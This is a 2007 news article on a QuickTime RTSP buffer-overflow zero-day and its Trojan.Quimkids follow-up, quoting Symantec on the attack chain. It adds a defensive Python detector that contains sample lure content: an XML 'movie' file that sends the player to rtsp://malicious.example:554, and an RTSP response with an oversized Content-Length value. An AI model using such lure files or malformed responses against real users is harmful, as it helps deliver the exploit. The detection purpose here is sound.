Via QuickTime Vulnerability

Nov 29, 2007 12:40 GMT  ·  By

An exploit built on a zero-day vulnerability in Apple's QuickTime media player is now gunning for Windows Vista. Initially, the Apple QuickTime RTSP Response Header Content-Length remote buffer overflow vulnerability was less likely to affect Microsoft's latest Windows client because of the mitigations that apply when the content is opened through browsers such as Internet Explorer 6/7 and Safari 3 Beta. The open source Firefox browser is more susceptible to attack because of the way it handles QuickTime content: it hands requests off to the player as a separate process, whereas IE and Safari both call the media player as a plug-in. Of course, malformed .mov, .qt, .qtl, .gsm, .3gp and similar files that masquerade as video material while being nothing more than malicious XML files would, once opened, trigger the exploit regardless of the browser the user is running.

"The attachment is not actually a media file, but instead it is an XML file which will force the player to open an RTSP connection on port 554 to the malicious server hosting the exploit. When the QuickTime Player contacts the remote server, it receives back the malformed RTSP response which triggers the buffer overflow and the execution of the attacker's shellcode immediately. This attack requires users to double-click on the QuickTime multimedia attachment to run. (...) In the Web browser attack scenario, the attack will most likely start with a hyperlinked URL sent to the user. When the user clicks on the URL, the browser loads a page that has a QuickTime streaming object embedded in it. The object initiates the RTSP connection to the malicious server on port 554 and exploit code is sent in response", explained Elia Florio, Symantec Security Response Engineer.

Security company Symantec subsequently reported that the original proof-of-concept code released in the wild has evolved and is now pushing a Trojan horse able to compromise both Windows Vista and Windows XP. Detected as Trojan.Quimkids, the proof-of-concept Trojan is set up to exploit the QuickTime RTSP vulnerability. With this evolution of the exploit, the malicious RTSP data stream is no longer essential to the attack, as the shellcode is now served through JavaScript. As no patch is available yet, Symantec advised users to block the RTSP protocol on their networks and to disable QuickTime browser objects and JavaScript.
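As an added illustration of the attack chain described above (an XML "media" attachment that drives QuickTime to an RTSP server on port 554, and an RTSP response with a malformed Content-Length header) and of the mitigations Symantec recommends, the following Python script, written for this page and not code from Symantec, Apple or the article's author, implements two defensive checks: it classifies a purported QuickTime attachment that is really an XML link file pointing at an rtsp:// URL, and it flags an RTSP response whose Content-Length value is not a short decimal number. The sample attachment, the placeholder host malicious.example, the sample RTSP responses and the size bounds are all constructed assumptions, not indicators from the article.

```python
import re

# ---- constructed samples (placeholders, not indicators from the article) --

# A "movie" attachment that is really a QuickTime XML link file sending the
# player to an RTSP server on port 554; the host name is a placeholder.
SUSPECT_ATTACHMENT = (
    b'<?xml version="1.0"?>\n'
    b'<?quicktime type="application/x-quicktime-media-link"?>\n'
    b'<embed src="rtsp://malicious.example:554/clip.mov" autoplay="true" />\n'
)

# A real QuickTime movie begins with a binary atom header, not with XML.
BENIGN_MOV = b"\x00\x00\x00\x14ftypqt  " + bytes(16)

# An RTSP response whose Content-Length value is hundreds of non-digit bytes
# where a small decimal number belongs (constructed, not the real payload).
MALFORMED_RTSP = (
    b"RTSP/1.0 200 OK\r\nCSeq: 1\r\nContent-Length: " + b"A" * 300 + b"\r\n\r\n"
)

BENIGN_RTSP = (
    b"RTSP/1.0 200 OK\r\nCSeq: 1\r\n"
    b"Content-Type: application/sdp\r\nContent-Length: 42\r\n\r\n"
)

MEDIA_EXTENSIONS = (".mov", ".qt", ".qtl", ".gsm", ".3gp")

# Assumed defensive bounds (chosen for this example, not taken from Apple).
CONTENT_LENGTH_RE = re.compile(rb"\d{1,12}")   # any real body size fits
MAX_HEADER_VALUE_BYTES = 1024                  # no RTSP header needs more


def is_xml_media_link(data: bytes) -> bool:
    """True when a purported media file actually starts like an XML document."""
    head = data.lstrip()[:32].lower()
    return head.startswith(b"<?xml") or head.startswith(b"<?quicktime")


def rtsp_targets(data: bytes) -> list:
    """rtsp:// URLs referenced by the file, decoded for readability."""
    found = re.findall(rb'rtsp://[^\s"\'<>]+', data)
    return [u.decode("ascii", "replace") for u in found]


def classify_attachment(filename: str, data: bytes) -> str:
    """Label a mail attachment that claims to be a QuickTime media file."""
    if not filename.lower().endswith(MEDIA_EXTENSIONS):
        return "not-quicktime-extension"
    if not is_xml_media_link(data):
        return "binary-media"
    return "xml-link-to-rtsp" if rtsp_targets(data) else "xml-link"


def parse_rtsp_headers(raw: bytes) -> list:
    """Split an RTSP response into (name, value) pairs without trusting sizes."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    headers = []
    for line in head.split(b"\r\n")[1:]:      # element 0 is the status line
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers


def check_rtsp_response(raw: bytes) -> list:
    """Return findings for an RTSP response; empty when it looks well-formed."""
    findings = []
    if not raw.startswith(b"RTSP/"):
        findings.append("not an RTSP response")
        return findings
    for name, value in parse_rtsp_headers(raw):
        if len(value) > MAX_HEADER_VALUE_BYTES:
            findings.append(f"{name.decode()}: {len(value)}-byte value exceeds bound")
        if name == b"content-length" and not CONTENT_LENGTH_RE.fullmatch(value):
            findings.append(
                f"content-length: non-numeric or oversized value ({len(value)} bytes)"
            )
    return findings


if __name__ == "__main__":
    print(classify_attachment("clip.mov", SUSPECT_ATTACHMENT), rtsp_targets(SUSPECT_ATTACHMENT))
    print(classify_attachment("clip.mov", BENIGN_MOV))
    print(check_rtsp_response(MALFORMED_RTSP))
    print(check_rtsp_response(BENIGN_RTSP))
```

The attachment check is the cheap one to run at a mail gateway: a file carrying a QuickTime extension whose first bytes are an XML prolog is exactly the "media file that is really an XML link" the article describes, and its rtsp:// targets tell you which hosts to block. The RTSP check belongs on a proxy or IDS that already sees port 554 traffic; it treats the Content-Length value as an untrusted string and never converts it to an integer before validating its length and character set.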

"A client requests a Web page from a malicious site. The page that is sent contains malicious shell code and a request for a QuickTime movie. If the client is using Internet Explorer, the shell code is written to a heap area for later use. Meanwhile, the browser receives the QuickTime movie and then opens it with QuickTime, creating an RTSP stream to the malicious server. Only the RTSP server in this scenario is hosting a hacked version, which actually sends back a stream that overwrites the stack in the client's QuickTime install. The end of the buffer overflow then calls the shell code that was previously written to the heap, and voila!, the malicious code is executed", stated Ben Nahorney, Senior Information Developer at Symantec.